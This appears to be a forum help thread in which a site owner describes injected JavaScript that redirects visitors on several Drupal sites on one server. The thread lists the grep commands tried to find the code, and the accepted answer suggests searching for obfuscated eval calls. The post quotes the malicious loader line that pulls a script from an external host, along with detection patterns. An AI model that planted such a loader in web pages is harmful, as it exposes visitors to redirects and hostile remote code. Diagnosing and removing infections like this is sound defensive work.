Javascript injected in all drupal websites of a server

Question

From last few days, my sites have been come across malicious attack. When I open a site http://site1.com it first goes to redirected on another page (possibly an ad page).

In chrome browser when I try to diagnose the problem through console (F12), I found it shows me a strange error. "Failed to load resource: net::ERR_NAME_NOT_RESOLVED" and url is - https://js.localstorage.tk/s.js?crt=new. In further investigation I found that it injects following script on every page load of every website on that particular server. (Not one site but 3-4 sites have been infected with same attack on same server).

var z = document.createElement("script"); z.type = "text/javascript"; z.src = "https://js.localstorage.tk/s.js?crt=new"; document.head.appendChild(z);

I have also tried to find this code snippet in hosted file systems of infected websites, using various "grep" commands as below but i couldn't found anything.

 grep -rwn /var/www/ -e 'js.localstorage.tk'
 grep -rwn /var/www/ -e 'var z'
 grep -rwn /var/www/ -e 'z.type'
 grep -rwn /var/www/ -e 'z.src'
 grep -rwn /var/www/ -e 'crt=new'

But no clue of malicious injected script. Same result in DB investigation.

When I access my site through LAN without internet then the same error with some weird URL :

GET https://js.localstorage.tk/s.js?crt=new net::ERR_NAME_NOT_RESOLVED debugger:///VM359:1

And worst thing is that now google has listed my sites into "Dangerous" list and it show warning "Deceptive site ahead" with dark red background.

Any help...!!!

sadadd · Accepted Answer

find code with this command

grep -rwn /var/www/ -e 'eval(String.fromCharCode'

Javascript injected in all drupal websites of a server

Answers (2)

Related Questions